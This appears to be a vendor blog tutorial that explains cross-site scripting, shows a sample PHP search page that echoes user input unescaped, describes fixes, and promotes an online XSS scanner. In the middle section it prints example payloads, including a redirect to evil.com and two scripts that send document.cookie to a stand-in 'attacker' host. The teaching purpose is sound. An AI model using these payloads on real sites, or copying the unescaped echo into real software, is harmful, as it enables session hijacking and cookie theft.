How To Test XSS Online and Free

In this post, we’ll teach you how to utilize Generic XSS Scanner, a free and internet-based tool that may be used to detect XSS.

Before we get into how to use our free XSS scanning tools, let’s quickly refresh our memories.

Click on the link below if you need to jump ahead quickly.

• What is XSS?
• What is the Risk of XSS?
• What are the types of XSS?
• Sample Code For XSS Vulnerability
• Fixing XSS Vulnerability
• How to Use Generic XSS Scanner: Test XSS Online
• Results

What is XSS?

XSS (Cross Site Scripting) is a type of vulnerability found in web applications that allow attackers to inject malicious code into web pages viewed by other users. This can allow the attacker to steal cookies, hijack user sessions, or redirect the user to malicious sites.

To exploit XSS vulnerabilities, after injecting malicious JavaScript code into a web page, the code must be executed by the victim’s browser.

What is the Risk of XSS?

XSS is one of the most common web application security risks. It can be used to:

• Hijack user sessions
• Steal cookies
• Deface websites
• Redirect users to malicious sites
• Inject malware onto the victim’s machine

What are the types of XSS?

There are three types of XSS vulnerabilities:

Reflected XSS – The malicious code is not stored on the web server. It is sent in an HTTP request and reflected off the web server, such as in an error message, search result, or any response that includes user input.

Stored XSS – The malicious code is permanently stored on the server, such as in a database, and displayed to users when they request a page.

DOM-based XSS – This type of attack does not involve injecting code into a web page. Instead, it uses vulnerabilities in client-side JavaScript to execute malicious code.

Sample Code For XSS Vulnerability

Let’s think that we have a blog app named example.com and there is a search bar for users to find necessary posts. When a user searches for something on our site, we show them a message that says “Results for {searched_terms}” and then blog posts containing those terms.

So basic codes should look like the below:

Search bar code:

<form action="get" action="/search"> <input type="text" name="term"> </form>

Result page code:

# Result Header Results for <?php echo $_GET['term'] ?>

<!-- Loop for blog post result -->

If a user searches for “security” term, our page would look like this.

URL: example.com/search?term=security

Result Header: Results For security

And everyone who visits the URL example.com/search?term=security will show the same page. Is everything alright? There isn’t a problem, is there? How about if user search some think like that: <b>bold</b>

URL: example.com/search?term=<b>bold</b>

Result Header: Results For bold

<b> tags placed in the search term appear as HTML code when displayed in browser search results. It will be the same for any HTML and JavaScript codes.

From an attacker’s perspective, how can this be beneficial? What if we search for : <script>window.location="https://www.evil.com"</script>

URL: example.com/search?term=<script>window.location="https://www.evil.com"</script>

Result Header: Results For

If you visit the URL, you will be redirected to evil.com without any notification because our JavaScript code is rendered in the browser.

Here are some other XSS attack payloads:

• Steal cookies: <script>img=new+image();img.src=”http://attacker/&#8221; + document.cookie;</script>
• Another payload to steal: <script>document.write(“<iframe src=’http://attacker/cookiegrabber.php?c=&#8221; + document.cookie + “‘></iframe>”);</script>
• Display a popup box: <script>alert(‘xss’);</script>

Fixing XSS Vulnerability

There are two main ways to fix XSS:

Input Validation: Only allow characters that are known to be safe. This can be done using blacklisting or whitelisting. This is not a comprehensive solution, but applying it correctly will indeed reduce the danger.

• Blacklisting – This approach involves identifying and removing dangerous characters from user input. The problem with this method is that it’s difficult to anticipate all the ways an attacker might try to inject malicious code.
• Whitelisting – This approach involves only allowing known good characters in user input. This is a more effective method, but it can be difficult to implement.

Output Encoding: When displaying user input, encode it in a way that will prevent the browser from interpreting it as HTML code. The only effective technique to fix an XSS vulnerability. There are different types of encoding depending on where the data will be displayed.

For example, if the data will be displayed in an HTML attribute, you would use HTML entity encoding. If the data will be used as part of a JavaScript code, you would use JavaScript escaping.

How to Use Generic XSS Scanner: Test XSS Online

We will use the Free and Online Generic XSS Scanner. There’s no need for any technical knowledge; all you have to do is click a few buttons. However, if you are an expert there are several settings and parameters that you can adjust to scan.

Simplest Way: Use Single Scan

The fast scan is a great way to use a free and online generic XSS scanner. You need to click one button only. Just enter any URL you want to scan and click the ‘Start Scan’ button.

But it has some limitations:

• If you want to scan the parameters of a form used in a page (like a login form), use the HTML form parser.
• The fast scan allows you to quickly check any parameter in the query string using the HTTP GET method.
• Use expert mode if the application accepts data using other HTTP methods (e.g., POST, PUT, or DELETE).
• If the application requires authentication to access a web page you wish to scan, use export mode with the necessary authentication header.

Second Way: Advanced Scan for Custom HTTP Requests

Our advanced scanning feature enables you to thoroughly test web applications by allowing full customization of HTTP requests. Whether you’re analyzing form parameters, exploring different HTTP methods, or including authentication headers, this mode provides the flexibility and control you need.

Here’s how to use it effectively:

• Automated Form Parameter Scanning:
  If your target URL includes forms (such as login or search forms), our scanner automatically detects and parses these forms. Simply enter the URL into the input field, and the system will analyze and include form parameters in the scan process.
• Flexible HTTP Method Selection:
  Choose from HTTP methods such as GET, POST, PUT, or DELETE to tailor your scan to the application’s behavior. This flexibility ensures you can test parameters and vulnerabilities that require specific methods.
• Custom Headers and Request Bodies:
  Include custom headers (e.g., authentication tokens) and define a request body as needed. This feature is especially useful for applications requiring authentication or complex input formats.

The advanced scan ensures that you have all the tools necessary to uncover vulnerabilities in any scenario, providing both precision and depth in your testing process.

Results

There will be three types of results from your scan:

• Compact: One-word output to see whether vulnerable or not.
• Detail: Some other detail of output such as parameters and vulnerability type
• Video: Commands that we used to check, the output of scan, vulnerability types. Watch all processes of the scan.

You can export the results as PDF, HTML, or CSV.

If you need any help, please do not hesitate to contact us via support page.

Happy and secure days for all!